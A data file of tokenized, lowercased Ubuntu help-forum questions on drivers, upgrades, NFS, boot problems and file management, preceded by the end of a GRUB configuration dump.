xnu_resume /var/vm/sleepimage ; then set do_resume=1 fi fi if [ $ do_resume = 0 ] ; then xnu_uuid 8a6a66edd559aa12 uuid if [ -f /extra/dsdt.aml ] ; then acpi -e /extra/dsdt.aml fi if [ /kernelcache -nt /system/library/extensions ] ; then xnu_kernel /kernelcache boot-uuid= $ { uuid } rd=*uuid else xnu_kernel /mach_kernel boot-uuid= $ { uuid } rd=*uuid if [ /system/library/extensions.mkext -nt /system/library/extensions ] ; then xnu_mkext /system/library/extensions.mkext else xnu_kextdir /system/library/extensions fi fi if [ -f /extra/extensions.mkext ] ; then xnu_mkext /extra/extensions.mkext fi if [ -d /extra/extensions ] ; then xnu_kextdir /extra/extensions fi if [ -f /extra/devprop.bin ] ; then xnu_devprop_load /extra/devprop.bin fi if [ -f /extra/splash.jpg ] ; then insmod jpeg xnu_splash /extra/splash.jpg fi if [ -f /extra/splash.png ] ; then insmod png xnu_splash /extra/splash.png fi if [ -f /extra/splash.tga ] ; then insmod tga xnu_splash /extra/splash.tga fi fi } menuentry 'mac os x ( 64-bit ) ( on /dev/sda2 ) ' -- class osx -- class darwin -- class os $ menuentry_id_option 'osprober-xnu-64-8a6a66edd559aa12 ' { insmod part_gpt insmod hfsplus set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 8a6a66edd559aa12 else search -- no-floppy -- fs-uuid -- set=root 8a6a66edd559aa12 fi load_video set do_resume=0 if [ /var/vm/sleepimage -nt10 / ] ; then if xnu_resume /var/vm/sleepimage ; then set do_resume=1 fi fi if [ $ do_resume = 0 ] ; then xnu_uuid 8a6a66edd559aa12 uuid if [ -f /extra/dsdt.aml ] ; then acpi -e /extra/dsdt.aml fi if [ /kernelcache -nt /system/library/extensions ] ; then xnu_kernel64 /kernelcache boot-uuid= $ { uuid } rd=*uuid else xnu_kernel64 /mach_kernel boot-uuid= $ { uuid } rd=*uuid if [ /system/library/extensions.mkext -nt /system/library/extensions ] ; then xnu_mkext /system/library/extensions.mkext else xnu_kextdir /system/library/extensions fi fi if [ -f /extra/extensions.mkext ] ; then xnu_mkext /extra/extensions.mkext fi if [ -d /extra/extensions ] ; then xnu_kextdir /extra/extensions fi if [ -f /extra/devprop.bin ] ; then xnu_devprop_load /extra/devprop.bin fi if [ -f /extra/splash.jpg ] ; then insmod jpeg xnu_splash /extra/splash.jpg fi if [ -f /extra/splash.png ] ; then insmod png xnu_splash /extra/splash.png fi if [ -f /extra/splash.tga ] ; then insmod tga xnu_splash /extra/splash.tga fi fi } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # for me it seems fine ...
458827	getting root permissions on a file inside of nano ?	i have completely the same problem as the guy in this question . so basically i am using nano somefile.txt editing it and then permissions denied because i forgot to use sudo . the only difference from the question is that i am using nano and therefore accepted solution does not work . is there anything similar for nano ?
458830	where are the mouse button settings in ubuntu 14.04 ?	i had my evoluent verticalmouse set up to work using hal fdi files in ubuntu gnome 13.10 and before . however , these no longer are respected by ubuntu gnome 14.04 so what configuration files are being used instead ? any pointers would be appreciated .
458831	how to a show the disc usage by directory in my home directory using the terminal ?	could someone let me know which tool i should use ? i 'm trying to run this on an ubuntu server vm . so i believe i need a tool such as discus .
458834	virtualbox does n't see wireless usb adapter	so i run ubuntu 14.04 as my main os , i have virtualbox installed which was from the software centre , what i am trying to do is add my alfa awus051nh dual band 802.11a/b/g/n wifi wireless-n usb adapter to my linux backbox installation . i 've read that all is needed is to add the usb under settings then add usb but this does n't work for me , it says `` no devices available '' . can anyone help me to add and get this adapter working under virtualbox ? thanks
458835	android mobile wiping softwares for ubuntu	are there any applications that can be used to wipe away and factory reset an android china tablet i have tried this one but this looks to be made only for windows https : //dl.dropboxusercontent.com/u/73932943/unlocking % 20tool.rar
458843	how does the linux kernel choose which firmware version to load ?	i installed the latest firmware for my network card n-7260 from http : //wireless.kernel.org/en/users/drivers/iwlwifi # firmware . i am using ubuntu 14.04 with kernel version 3.14.01 from the kernel 's team ppa . here is a list of firmware i have in /lib/firmware : $ ls /lib/firmware/*iwl*7260* /lib/firmware/iwlwifi-7260-8.ucode /lib/firmware/org.iwlwifi-7260-7.ucode /lib/firmware/iwlwifi-7260-9.ucode /lib/firmware/org.iwlwifi-7260-8.ucode right now it seems that version 9 does not load . if i remove version 8 , i see on boot the following message : sudo dmesg | grep iwl [ sudo ] password for ozubu : [ 6.121743 ] iwlwifi 0000:02:00.0 : irq 62 for msi/msi-x [ 6.133208 ] iwlwifi 0000:02:00.0 : direct firmware load failed with error -2 [ 6.133211 ] iwlwifi 0000:02:00.0 : falling back to user helper [ 6.311794 ] iwlwifi 0000:02:00.0 : direct firmware load failed with error -2 [ 6.311799 ] iwlwifi 0000:02:00.0 : falling back to user helper [ 6.324940 ] iwlwifi 0000:02:00.0 : request for firmware file 'iwlwifi-7260-7.ucode ' failed . [ 6.324950 ] iwlwifi 0000:02:00.0 : no suitable firmware found ! so , my question is : how do i tell linux it should load iwlwifi-7260-9.ucode ? update oddly enough , the firmware version loaded now is 8 , at least according to dmesg : $ sudo dmesg | grep iwl [ sudo ] password for ozubu : [ 18.970651 ] iwlwifi 0000:02:00.0 : irq 62 for msi/msi-x [ 19.012648 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 19.315472 ] iwlwifi 0000:02:00.0 : detected intel ( r ) wireless n 7260 , rev=0x144 [ 19.315899 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 19.316118 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 19.523132 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' [ 23.100268 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s [ 23.100484 ] iwlwifi 0000:02:00.0 : l1 disabled ; enabling l0s
458848	starting a windowed program in a specific workspace , from command line	i wonder if i can `` send '' a windowed program into a specific workspace when i start it via command line . for example , i would like to start my computer with a certain number of windowed programs open in different workspaces . is this possible ? what are some basic concepts behind this ? i am using unity , on ubuntu 14.04 . i also tried to start gdevilspie but it seems to be affected by a bug . thanks ! : )
458849	zfs on linux : setting up nfs on ubuntu 14.04	i upgraded my headless server from 13.10 to 14.04 , but borked the upgrade ( and stupidly did n't have a backup image - lesson learnt ) . hence , i 'm reinstalling everything from scratch . i have a working zpool set up with several datasets , and am trying to get nfs set up to access it across my network from my macbook . previously , i had it working by specifying shares in /etc/exports , but i no longer have a copy of that file and can not remember the options i specified . i 've tried following the process in http : //bit.ly/1hgarrk , but # showmount -e results in no mounts shown . zfs get sharenfs returns name property value source data/music_lossless sharenfs rw= @ 192.168.0.0/24 , insecure local when instead i specify in /etc/exports /mnt/data/music_lossless 192.168.0.0/24 ( rw , async , no_root_squash , no_subtree_check , crossmnt ) from # showmount -e i get /mnt/data/music_lossless 192.168.0.0/24 , but can not connect from my macbook . $ rpcinfo -p 192.168.0.126 on the macbook confirms nfs is visible : 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100227 2 tcp 2049 100227 3 tcp 2049 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100227 2 udp 2049 100227 3 udp 2049 can anyone see immediately what 's going wrong , or give me hints as to how i resolve this ?
458853	dell inspiron n4110 does n't start with recurring low battery beep	took the dell n4110 inspiron to school today , i opened it up , and when the low battery noise beeped i realized i forgot to charge it and shut the lid immediately as it was loud and in the middle of class , i shut it in the middle of the beep ( it might 've frozen or something ? ) . now when i try to start it up again ( with or without the ac adapter ) it makes the same low battery beep , tries to start up , and just continues trying to start up again continually making that beep . i 've removed the battery and kept it plugged in to make sure it was n't a battery problem ( it was n't ) and it does the same thing . i ca n't even get to bios to run system checks or anything . i 'm dual booting ubuntu and windows 7 , i3 processor , dell inspiron n4110 , any one have a similar problem or have any ideas ? i think performing a hard reset would help but i do n't know how ? thanks for your help .
458854	can not go to black screen ( manual login , ctrl+alt+f2 ) and can not stop light dm	i have ubuntu 12.04 installed on my connoiseur work station with intel xeon processor . it has tesla c1060 graphics card . recently , the system encountered a kernel error and a pop up window appeared asking for the update of a particular kernel file ( sorry , i do n't remember the file name ) . the system encountered some graphics related issues after that and it crashed . i had the system repaired and installed ubuntu 12.04 again . now the problem is , i am trying to install graphics card driver , in order to do that i am trying to stop 'lightdm ' and the system is freezing . the manual login screen ( ctrl+alt+f2 ) does n't appear either , when i try to go to the manual login screen the system freezes . i can return to the main screen by pressing ctrl+alt+f7 . are these issues related ? is there a solution to this problem ? thanks in advance .
458856	hebrew font in terminal ubuntu 12.10	i have files on usb dok that i ca n't accesses since the folder name is in hebrew i use ubuntu 12.10 ll /media/user/kingston drwx -- -- -- 16 user user 8192 apr 28 16:40 ? ? ? ? ? ? ? ? ? ? / ll /media/ilan/kingston/ ? ? ? ? ? ? ? ? ? ? / ls : can not access /media/user/kingston/����������/hour-report : input/output error ls : can not access /media/user/kingston/����������/ documents : input/output error ls : can not access /media/user/kingston/����������/files : input/output error d ? ? ? ? ? ? ? ? ? ? ? ? ? ? documents/ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? files/ d ? ? ? ? ? ? ? ? ? ? ? ? ? ? hour-report/
458859	location of old package list after failed upgrade	the upgrade to ubuntu 14.04 failed on my maschine . during the process the output stated , that the list of previously installed packages was saved to a location . unfortunately i do not remember the exact location . i would like to find this list to install the same packages after a complete fresh ubuntu setup .
458860	ubuntu does not load open source video driver	my notebook uses ati radeon hd3650 as the graphical card , and runs ubuntu 13.04 32bit . i use open source video driver for it ( radeon ) , but it seems that this driver is not loaded by ubuntu , then it does not work . i use `` lshw -c video '' to check the video driver , and the output is here : also i tried `` dmesg | egrep 'drm|radeon ' '' suggested by ubuntu help document , and the output is here : my xorg.conf file is shown here : i have tried `` dpkg-reconfigure -phigh xserver-xorg '' , but it does not work . currently ubuntu in my laptop only supports the resolution with 4:3 ratio , but the actual optimal resolution of the screen is with 16:9 ratio . i am sure that the open source drivers are correctly installed by default , and i do not have any binary drive from ati in use ( actually the ati driver for my card ( catalyst 13.1 ) does not work with the xserver ( 1.13 ) currently used by raring ) . thanks for reading , and i appreciate for any advice .
458872	how can i use firefox-29.0.tar.bz2	i have downloaded `` firefox-29.0.tar.bz2 '' to update my firefox now i have query how to use this to update firefox ?
458873	restoring old boot order after boot repair cd	after installing ubuntu 14.04 alongside pre installed windows 8 laptop ( after disabling secure boot ) the system booted directly to windows 8 . however when i open the boot menu at system startup , i was able to access ubuntu as it was listed as a separate entry . then , i used boot-repair-disk as live usb and repaired the boot device which fixed the issue however it produced a lot of entries in the grub boot menu as follows . now , i want to remove the changes made by boot-repair and revert back to the previous state .
458875	how to modify unity windows snapping shotcuts	when unity 's window snapping is enabled the following short cut 's are enabled too : snap left : ctrl+super+left snap right : ctrl+super+right naively i though this was configured in org.gnome.desktop.wm.keybindings in the move-to-side-e/w but it 's not . i 'd like to modify these keybindings where can i do that ? thanks alain
458878	how can i take lxc container backup	i want to take lxc container backup . we have server with 12.04 lts ubuntu server and i have installed lxc - 1.0.0.alpha2 in it . i wanted to update our ubuntu server to 14.04 lts . so what i want to do is have lxc containers backed up - > upgrade os to 14.04 - > restore lxc containers . with earlier version ( 0.7.5 i guess ) there was lxc-backup and lxc-restore but with 1.0.0.alpha2 we do n't have backup and restore operations . how can i have lxc containers backup . i spent more than 3 hours with copy container folder ( /var/lib/lxc/my_container/ ) into pendrive and paste it in another 12.04 lts server but it is not working the error am getting is , # sudo lxc-start -n my_container lxc-start : invalid sequence number 1 , expected 4. lxc-start : failed to spwan `` my_container '' then how can i expect that it will work in upgraded 14.04 server os . any idea to have lxc-container backup ?
458879	deleting files by way of the terminal where files have a certain keyword	update status of the process for the command rm -rf ~/.local/share/trash/files/ has been set to very high . command was initiated at 0745 today and is still running . cpu time is current 53 seconds at 0955 , memory is constant at 52.0 mib . status goes between running and uninteruptible i opened up nano yesterday to just look at a file and noticed that inside of my home directory i have a very large amount of files in there that can be deleted . they are there because awhile back i accidentally turned my home directory into a git repo . i undid this , but i want to clean up the mess that i could only see when viewing the folder when searching for a file using nano . i have this same problem in my trash bin where i have so many files in it from bad git repos that i can not just click on the trash bin and click empty bin all 8 gigs plus the swap get used up and nothing gets deleted . how can i delete files from the terminal where the files meet a certain pattern ? i have tried the following command : rm -rf ~/.local/share/trash/files/* rm -rf ~/.local/share/trash/info/* and i eventually some time later get a message that there are just to many files and it does not delete . i would like to say delete all files that start or end with some pattern like .quo or whatever they might be . to sum it up : how do i list all the files so that i can at least start finding some begining or ending patterns to identify those for deletion how do i use that pattern to delete them ?
458882	bypass sudo for a group of commands	i need to bypass sudo for a group of commands for a certain user so the command is just executed without using the sudo
458886	mounting and reformatting an hpfs flash drive	a while back i downloaded the ubuntu 13.10 iso and used linux mint to make an install disc . ubuntu 14 came out , though , and i want to create multiple os installers on that flash drive . in windows , when i plug it in , there are two drives . one ( a few megs ) asks me to format it , and the other says to insert a disc . in ubuntu , it says it is hpfs/secure ntfs format , and wo n't mount it . this is the output : dakotashannon @ ubuntu : ~ $ sudo fdisk -l [ sudo ] password for dakotashannon : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00099013 device boot start end blocks id system /dev/sda1 * 2048 310501375 155249664 83 linux /dev/sda2 310503422 312580095 1038337 5 extended /dev/sda5 310503424 312580095 1038336 82 linux swap / solaris disk /dev/sdb : 4012 mb , 4012900352 bytes 64 heads , 32 sectors/track , 3827 cylinders , total 7837696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x57a46a4a device boot start end blocks id system /dev/sdb1 * 64 1832959 916448 17 hidden hpfs/ntfs dakotashannon @ ubuntu : ~ $ sudo mkdir /media/external mkdir : can not create directory ‘/media/external’ : file exists dakotashannon @ njrotc-compaq-mini-110c : ~ $ sudo mount -t hpfs /dev/sdb1 /media/external mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dakotashannon @ ubuntu : ~ $ sudo fsck.vfat -f -p /dev/sdb1 fsck.fat 3.0.26 ( 2014-03-07 ) logical sector size ( 8224 bytes ) is not a multiple of the physical sector size . dakotashannon @ ubuntu : ~ $ sudo mount -t hpfs /dev/sdb1 /media/external mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so dakotashannon @ ubuntu : ~ $ sudo dmesg | tail [ 13329.677118 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 13329.677125 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 13329.677133 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13329.677140 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13329.677147 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13329.677153 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 13329.677161 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 13797.611039 ] hpfs : bad magic ... probably not hpfs [ 14249.453868 ] hpfs : bad magic ... probably not hpfs [ 14536.922666 ] systemd-hostnamed [ 22382 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! dakotashannon @ ubuntu : ~ $ sudo apt-get install nss-myhostname reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nss-myhostname dakotashannon @ ubuntu : ~ $
458887	window snapping changes in tweak tool not taking effect	i 'm trying to change the window snapping behavior in unity ( 14.04 ) using the tweak tool . the window snapping section of the tool is available , and all the options are available ( not greyed out ) . i make the changes i want , but the actual snapping behavior does n't change . for instance , i set the bottom screen edge to `` bottom half '' , and then drag a window to the bottom edge and nothing happens . closing the tweak tool , logging out and back in , and even restarting the whole computer do n't help . after making a change , if i close and then reopen the tweak tool , the change persists . it 's simply not reflected in the actual snapping behavior . any thoughts ?
458888	ubuntu 14.04 usb install on older laptop stalling	trying to install ubuntu 14.04 on an older hp pavilion using a flash drive as the install device . the unit gets through a start-up screen showing `` ubuntu '' with a row of progress dots just below it . then rolls to purple desktop ( blank , not black ) except for a few control icons up top ( battery , volume , settings ) ) and stalls indefinitely - no `` install '' window ever comes up . is this a symptom of the computer not having adequate processing power or perhaps an incorrectly formatted installation usb ? thanks
458891	install bettery drivers for ubuntu 14.04	i have recently installed ubuntu and it seems ve [ ] ry power consuming . after installing it it heats up too much . is there any battery drivers available here for ubuntu . my leaptop configuration is : sony vaio i5 2nd gen 4 gb ram 500 mb nvidia .
458894	wifi problem with my laptop both ubuntu and windows8	my laptop model : toshiba satellite a500-1g0 wifi is disabled by hardware switch . i tried to check on windows 8 and the problem is the same as on ubuntu . on ubuntu , the wifi indicator-light is on but it 's disabled by hardware switch and on windows 8 the indicator-light of the wifi is off . how can i enable my wifi ?
458897	do-release-upgrade error : `` connection failed '' updating from 10.04 to 12.04	last week i upgraded one of my 10.04 lts to 12.04 lts strictly following the link ( except using screen tool ) and the upgradation is successful . similarly when i try to upgrade another 10.04 lts to 12.04 lts , i 'm getting the errors while apt updating/fetching , i 'm unable to copy paste all that are on screen as i 'm doing the upgrade directly connecting the machine rather than via ssh but still managed to take below screenshot , this is where it ended : below is my sources.list file # # deb cdrom : [ ubuntu-server 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) ] / lucid main restricted # deb cdrom : [ ubuntu-server 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu/ lucid main restricted deb-src http : //archive.ubuntu.com/ubuntu/ lucid main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu/ lucid universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid universe deb http : //archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu/ lucid multiverse deb-src http : //archive.ubuntu.com/ubuntu/ lucid multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu lucid partner deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu lucid-security main restricted deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe deb http : //security.ubuntu.com/ubuntu lucid-security multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse anybody has any idea how to fix this ? thank you ! . update:1 i tried changing the sources.list to different sources but the result is same . /var/log/dist-upgrade/main.log 2014-05-05 12:13:34,904 debug upgrade : apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common apparmor apparmor-utils apport apt apt-cacher apt-transport-https apt-utils aptitude avahi-daemon base-files bash bash-completion bind9-host binutils bsdmainutils byobu bzip2 ca-certificates command-not-found command-not-found-data console-setup coreutils cpio cpp cpp-4.4 cpu-checker cron debianutils dhcp3-client dhcp3-common dnsutils dpkg dpkg-dev e2fslibs e2fsprogs elinks-lite file fontconfig-config friendly-recovery fuse-utils g++ g++-4.4 gcc gcc-4.4 gcc-4.4-base gnupg gnupg-curl groff-base grub-common grub-pc icedtea-6-jre-cacao ifupdown info initscripts insserv installation-report iproute iptables iputils-arping iputils-ping kbd language-selector-common libacl1 libapache2-mod-perl2 libapache2-mod-perl2-dev libapache2-mod-php5 libapparmor-perl libapparmor1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap libapt-inst1.4 libapt-pkg-perl libapt-pkg4.12 libasound2 libatm1 libattr1 libauthen-pam-perl libavahi-client3 libavahi-common3 libberkeleydb-perl libblkid1 libbsd-resource-perl libbsd0 libbz2-1.0 libc-bin libc-dev-bin libc6 libc6-dev libcap2 libcomerr2 libcups2 libcurl3 libcurl3-gnutls libcwidget3 libdb4.8 libdbd-mysql-perl libdbi-perl libdbus-1-3 libdbus-glib-1-2 libdrm-intel1 libdrm-radeon1 libdrm2 libedit2 libelf1 libexpat1 libexpat1-dev libflac8 libfontconfig1 libfontconfig1-dev libfreetype6 libfreetype6-dev libfuse2 libgcc1 libgcrypt11 libgd2-xpm libgdbm3 libgif4 libglib2.0-0 libgnutls26 libgomp1 libgpg-error0 libgpm2 libgssapi-krb5-2 libhtml-parser-perl libice-dev libice6 libidn11 libio-interface-perl libio-pty-perl libjpeg62 libjpeg62-dev libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 liblcms1 libldap-2.4-2 liblocale-gettext-perl liblockfile1 libltdl7 libmagic1 libncurses5 libncursesw5 libnet-ssleay-perl libnewt0.52 libnih-dbus1 libnih1 libnl1 libnspr4-0d libnss3-1d libogg0 libpam-modules libpam0g libparted0debian1 libpcap0.8 libpci3 libpcre3 libpcsclite1 libplymouth2 libpng12-0 libpng12-dev libpopt0 libpulse0 libreadline6 librpc-xml-perl libsasl2-2 libsasl2-modules libselinux1 libsepol1 libsigc++-2.0-0c2a libslang2 libsm-dev libsm6 libsndfile1 libsqlite3-0 libss2 libssl0.9.8 libstdc++6 libstdc++6-4.4-dev libsub-name-perl libtalloc2 libtasn1-3 libterm-readkey-perl libtext-charwidth-perl libtext-iconv-perl libudev0 libusb-0.1-4 libuuid1 libvorbis0a libvorbisenc2 libwbclient0 libwrap0 libwww-curl-perl libwww-perl libx11-6 libx11-data libx11-dev libxau-dev libxau6 libxcb1 libxcb1-dev libxdmcp-dev libxdmcp6 libxext6 libxfont1 libxi6 libxml-libxml-perl libxml-parser-perl libxml-sax-perl libxml2 libxmuu1 libxpm-dev libxpm4 libxrender1 libxt-dev libxt6 libxtst6 linux-generic-pae linux-headers-generic-pae linux-image-generic-pae locales logrotate lsb-release man-db module-init-tools mount mountall mysql-common mysql-server nano ncurses-bin net-tools ntfs-3g ntpdate odbcinst openjdk-6-jdk openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssh-client openssh-server openssl os-prober parted passwd pciutils perl perl-base perl-modules php-pear php5 php5-cli php5-common php5-curl php5-gd php5-mysql pkg-config plymouth procps psmisc python python-apport python-apt python-dbus python-gdbm python-gnupginterface python-gobject python-httplib2 python-launchpadlib python-lazr.restfulclient python-lazr.uri python-minimal python-newt python-oauth python-openssl python-pam python-pexpect python-problem-report python-pycurl python-serial python-simplejson python-smartpm python-twisted-bin python-twisted-core python-wadllib python-zope.interface rsync rsyslog samba samba-common samba-common-bin sudo sysvinit-utils tar tcpdump ubuntu-minimal udev ufw unixodbc update-manager-core update-notifier-common upstart ureadahead usbutils util-linux uuid-runtime vim vim-common vim-runtime vim-tiny w3m wget whiptail wireless-crda wireless-tools wpasupplicant x11proto-core-dev xfonts-utils xkb-data xz-utils zlib1g zlib1g-dev 2014-05-05 12:13:34,910 debug apt btrfs snapshots supported : false 2014-05-05 12:13:34,910 debug cache aufs_rw_dir : /tmp/ 2014-05-05 12:13:34,911 debug free space on / : 42229010432 2014-05-05 12:13:34,911 debug dir /usr mounted on / 2014-05-05 12:13:34,912 debug dir /var mounted on / 2014-05-05 12:13:34,912 debug dir /boot mounted on / 2014-05-05 12:13:34,913 debug dir /var/cache/apt/archives mounted on / 2014-05-05 12:13:34,913 debug dir /tmp mounted on / 2014-05-05 12:13:34,914 debug dir /home mounted on / 2014-05-05 12:13:34,914 debug dir /tmp mounted on / 2014-05-05 12:13:34,914 debug fs_free contains : ' { '/var ' : < distupgradecache.freespace object at 0x91b53ac > , '/tmp ' : < distupgradecache.freespace object at 0x91b53ac > , '/usr ' : < distupgradecache.freespace object at 0x91b53ac > , '/boot ' : < distupgradecache.freespace object at 0x91b53ac > , '/home ' : < distupgradecache.freespace object at 0x91b53ac > , '/ ' : < distupgradecache.freespace object at 0x91b53ac > , '/var/cache/apt/archives ' : < distupgradecache.freespace object at 0x91b53ac > } ' 2014-05-05 12:13:35,540 debug linux-image-3.2.0-61-generic-pae ( new-install ) added with 19135549 to boot space 2014-05-05 12:13:36,217 debug dir '/var/cache/apt/archives ' needs '76120226 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 42229010432.000000 ) 2014-05-05 12:13:36,220 debug dir '/usr ' needs '317531136 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 42152890206.000000 ) 2014-05-05 12:13:36,220 debug dir '/usr ' needs '52428800 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 41835359070.000000 ) 2014-05-05 12:13:36,220 debug dir '/boot ' needs '19135549 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 41782930270.000000 ) 2014-05-05 12:13:36,220 debug dir '/tmp ' needs '5242880 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 41763794721.000000 ) 2014-05-05 12:13:36,220 debug dir '/ ' needs '10485760 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 41758551841.000000 ) 2014-05-05 12:13:36,221 debug dir '/tmp ' needs '0.0 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 41748066081.000000 ) 2014-05-05 12:13:36,221 debug dir '/usr ' needs '0.0 ' of ' < distupgradecache.freespace object at 0x91b53ac > ' ( 41748066081.000000 ) 2014-05-05 12:13:36,233 debug demoted : 'python-smartpm python-central' 2014-05-05 12:13:36,233 debug found components : { 'precise ' : set ( [ 'restricted ' , 'main ' , 'multiverse ' , 'universe ' ] ) , 'precise-security ' : set ( [ 'restricted ' , 'main ' , 'multiverse ' , 'universe ' ] ) , 'precise-updates ' : set ( [ 'restricted ' , 'main ' , 'multiverse ' , 'universe ' ] ) } 2014-05-05 12:13:42,216 debug abort called 2014-05-05 12:13:42,220 debug opencache ( ) 2014-05-05 12:13:42,220 debug failed to systemunlock ( ) ( e : not locked ) 2014-05-05 12:13:44,763 debug /opencache ( ) , new cache size 31947 2014-05-05 12:13:44,772 debug enabling apt cron job lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid
458901	page sizing for facebook , email home page can not be enlarged	after latest release my email page and facebook page size is very small ( i ca n't read it without glasses ) i can find no way to enlarge these pages . what happened in the new release that changed this .
458904	system does not boot , just a black screen after uninstalling/removing smth	04 doesnt boot anymore . it starts up normally , bios works , but i do n't see the ubuntu-logo or the login screen , just a lighted black screen . no error or smth is displayed . the system doesnt react to any input . before shutting down the system earlier today i applied some changes to it ( i believe , i broke something by not thinking before acting -.- ) : - unistalled of ubuntu one , first via software center , then deleting entrys with ubuntuo one via synaptics - sudo apt-get autoremove - using `` aufr채umen '' ( clean ? ) ( sorry , german , maybe `` manager '' ) from ubuntu tweak ( it deleted some old kernels and stuff the system `` does n't need '' ) - installation of owncloud clients and 'tray' i think thats all i changed recently , i was using it the whole morning ! i think ill have to post some details or logs but i do n't know which ones and how to get them : ( id be happy if somebody helps me : ) thank you ! raphael
458906	upgrade from 12.04 to 14.04 via cd/usb image	i have ubuntu 12.04 installed and have 14.04 iso file . is there any way to enable upgrading using this image file and not have to download lots of files ? it 's because , the internet is a bit of a problem where i live .
